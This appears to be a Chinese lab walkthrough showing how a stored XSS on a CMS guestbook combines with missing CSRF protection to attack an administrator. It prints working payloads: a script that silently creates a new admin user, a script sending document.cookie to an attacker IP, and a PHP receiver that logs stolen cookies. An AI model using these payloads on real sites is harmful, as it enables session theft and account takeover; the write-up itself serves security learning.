csrf+xss组合拳

csrf+xss组合拳

一、环境搭建

靶场cms文章管理系统

二、流程开始

这是系统前端

系统管理后台

而我们要打到后台管理员的cookie,结合前端存储型的xss完全可以实现,那后端怎么被打到cookie呢,我们来从这里添加用户开始分析数据包来说明

看看数据包。其中提交的字段是act=add(添加),username、password

那我们通过编写恶意js

复制代码
<script>
var xmlhttp = new XMLHttpRequest(); 
xmlhttp.open("POST", "http://192.168.137.45/cms/cms/admin/user.action.php", false); 
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); 
xmlhttp.send("act=add&username=waou&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0"); 
</script>

寻找前端存储型xss,在这里留言板

去后台查看很明显插入了

我们把我书写的恶意js插入进去,这段恶意js创建的是waou用户,插入看看吧

插入成功

看看结果waou是否被创建

成功,不一定添加管理员,也可以盗取cookie,这个漏洞的最大问题还是存储型漏洞,这个框架也没用csrf防御的tokle值,所以导致管理员点击后直接创建新管理员

盗取cookie:

复制代码
<script>
    var cookie = document.cookie;
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "http://192.168.137.45/ceshi/cookie.php?cookie=" + encodeURIComponent(cookie), true);
    xhr.send();
</script>

攻击机192.168.137.45接收

复制代码
<?php
if (isset($_GET['cookie'])) {
    $cookie = $_GET['cookie'];
    $file = 'cookie.txt';
    if (file_put_contents($file, $cookie) !== false) {
        echo "Cookie has been saved to cookie.txt";
    } else {
        echo "Failed to save cookie.";
    }
} else {
    echo "No cookie received.";
}
?>

访问之后可以看到cookie已经被盗取

相关推荐
学习中的DGR7 小时前
[GXYCTF2019]Ping Ping Ping 1和[SUCTF 2019]EasySQL 1新手解题过程
sql·安全·web安全·网络安全·php
上海云盾商务经理杨杨7 小时前
付费网站的攻防战:2026年,如何破解并抵御爬虫攻击
网络·安全
夜勤月7 小时前
给AI装上“文件之手”:深入解析MCP文件系统服务的安全沙箱与读写实践
人工智能·安全
飞函安全9 小时前
飞函:为政企沟通加上“安全锁“
安全
weixin_462446239 小时前
使用 jsr:@langchain/pyodide-sandbox 构建 Python 安全沙箱(完整入门教程)
python·安全·langchain·sandbox
猿码优创9 小时前
过滤境外ip和域名访问的解决方案
网络·网络协议·tcp/ip·安全·阿里云
九河云13 小时前
纺织印染“数字色差仪”:光谱+AI模型一次调色成功省染料12%
大数据·人工智能·安全·机器学习·数字化转型
KKKlucifer13 小时前
数据安全服务的技术深耕与场景适配:行业实践全景解析
网络·安全
虹科网络安全13 小时前
艾体宝方案|人工智能如何重塑威胁检测与身份安全
人工智能·安全
2301_7807896615 小时前
2025年UDP洪水攻击防护实战全解析:从T级流量清洗到AI智能防御
服务器·网络·人工智能·网络协议·安全·web安全·udp